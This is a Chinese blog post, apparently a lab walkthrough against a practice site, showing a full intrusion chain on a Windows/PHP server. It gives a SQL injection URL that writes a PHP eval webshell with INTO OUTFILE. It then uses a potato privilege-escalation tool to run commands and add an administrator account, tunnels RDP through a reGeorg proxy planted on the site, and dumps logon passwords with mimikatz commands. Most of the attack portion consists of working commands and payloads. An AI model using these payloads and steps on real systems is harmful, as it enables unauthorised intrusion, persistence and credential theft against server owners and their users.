sql获得权限,内网穿透获取管理员密码(小宇特详解)

sql获得权限内网穿透获取管理员密码

SQL注入拿webshell(into outfile into dumpfle)

先输入?id=1和?id=2

在这里插入图片描述
在这里插入图片描述

如果id=1能回显 id=2不能回显,id=2-1能回显,说明有sql注入

在这里插入图片描述

sql注入其实可以写webshell的

into outfile 导出文件

into dumpfile 导出文件

将查询的结果导出成文件

http://afsgr16-b1ferw.aqlab.cn/?id=1 union select 1,2 into outfile ‘C:/phpStudy/WWW/123456.txt’

在这里插入图片描述

webshell管理工具

菜刀,蚁剑=>一句话木马直接相连(默认流量没有加密)

冰蝎,哥斯拉=>流量有加密,只能上传他自己的木马

这里在sql注入点注入一句话木马

http://afsgr16-b1ferw.aqlab.cn/?id=1 union select 1,"<?php eval($_REQUEST[8])?>" into outfile ‘C:/phpStudy/WWW/4448.php’

在这里插入图片描述

提权辅助页面,查询系统可能存在的漏洞

这里将直接用菜刀连接,连接密码为8,连接后打开虚拟终端,这里先看一下权限whoami

在这里插入图片描述

当我们遇到不是管理员权限的时候我们肯定需要提权

1.利用目标主机上的服务提权(目标主机运行的xxx软件,但是这个软件有漏洞可以利用)

2.利用web服务(一台机器上可能有多个网站,多个web容器)

3.利用windows漏洞systeminfo找补丁,找没有打的补丁

在虚拟终端中输入systeminfo来查看系统信息

在这里插入图片描述

这个是一个windows提权辅助工具https://i.hacking8.com/tiquan/

在这里插入图片描述

将systeminfo查到的已打的补丁,查询得到没有打的补丁。然后根据靶机的型号来在github上找到这个cve的漏洞进行操作。

利用魔改版烂土豆提权

这里有一个提权神器。烂土豆。这里可以通过烂土豆来提权

将烂土豆的exe文件,拖入到目录中改名(因为这里的原来的文件名太长了)。在虚拟终端中打开1111.exe(这里改成了1111.exe)。

在这里插入图片描述

直接输入1111.exe -p "whoami"来进行提权。

在这里插入图片描述

这里已经成了系统权限。

这里通过烂土豆来用系统命令来进行生成一个新的用户

在这里插入图片描述

这里可以在网上搜索windows cmd修改管理员权限

net localgroup administrators 用户名 /add

这里1111.exe -p “net localgroup administrators xhy /add”

在这里插入图片描述

这里已经提权了

内网传透(通过reg来设置中转站,然后用全局代理远程桌面)

远程桌面只有管理员可以连接

netstat -ano来查看端口

在这里插入图片描述

cmd命令mstrc远程桌面连接

在这里插入图片描述

你在这里将创建的管理员账号输入,发现登不上。这里是什么原因呢。刚刚咱们找到的那台机器是windows2008,现在是2003这是为什么呢

这就像域名的核心是ip,一个ip底下可能有多台服务器,这些服务器就共用了一个ip,这个的核心是端口映射,这里解释一下什么是端口映射,相当于是有3个主机ABC连在了一个路由器上,这里说网关吧,假如A主机开的3389端口,而B主机不开的3389端口,这样从外网你用3389访问,网关就会让你访问A主机,是永远不可能访问到B主机的。

这里使用了php作为了中间的媒介(PHP可以帮助我们发起请求)

这里使用正向连接:请求=>php=>发送出去 这里的php就相当于一个间谍

将后缀为php的reGeorg这个tunnel.nosocket.php放到菜刀的目录中,也就是网站的目录中。

在这里插入图片描述

改个好写的名字访问一下

在这里插入图片描述

出现这种样子说明就ok了

在这个目录下cmd一下,这里运行python环境,这里我的是py2,这个只有py2能运行,py3就不行了,这个reGrorg是基于py2的。这里输入python reGeorgSocksProxy.py

在这里插入图片描述

然后这里会有一些指令,python reGeorgSocksProxy.py -u http://afsgr16-b1ferw.aqlab.cn/2222.php -p 5242(-u后加那个文件的位置,-p后加端口映射的端口)

在这里插入图片描述

等这个运行开以后还得用一个全局流量代理将3389远程桌面连接的请求发到5242端口

全局代理

这里的全局代理用的是Proxifier。

在这里插入图片描述

点开配置文件的代理服务器,地址设置为本地127.0.0.1 端口为5242 协议为socks5。然后检查。

在这里插入图片描述

接下来这里添加一个规则,名称就写mstsc,应用程序是mstsc.exe,这里的动作用代理也就是proxy SOCKS5 127.0.0.1另一个direct的意思是不拦截。

在这里插入图片描述

点击确定。

在菜刀的虚拟终端中,ipconfig一下,发现主机是10.0.1.4

mstsc远程连接一下,这里用自己添加的管理员账户xhy 和 A1B2C3!.Qa登录

登录后用管理员权限打开2.exe

log生成日志

在这里插入图片描述

提升权限privilege :: debug

抓取密码sekurlsa :: logonpasswords

在这里插入图片描述

在这里插入图片描述

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小宇特详解

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值